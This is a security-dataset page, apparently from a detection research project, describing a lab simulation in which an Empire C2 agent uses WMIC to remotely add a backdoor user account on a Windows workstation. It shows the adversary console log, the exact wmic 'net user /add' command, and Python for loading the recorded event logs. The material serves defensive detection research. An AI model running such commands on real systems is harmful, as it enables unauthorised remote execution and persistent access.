Contents

Empire Remote WMIC Add User

Contents

Empire Remote WMIC Add User#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/14
Modification Date	2020/09/22
Tactics	TA0002,TA0008
Techniques	T1047
Tags	WMI IWbemServices ExecMethod,User Backdoor

Dataset Description#

This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip

Simulation Metadata#

Tools#

type	Name	Module
C2	Empire	shell

Adversary View#

(Empire: agents) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            
YGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            
UBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            

6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            

(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) > 
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) > 
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
  ProcessId = 7768;
  ReturnValue = 0;
};

..Command execution completed.

(Empire: 6Z78CY25) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/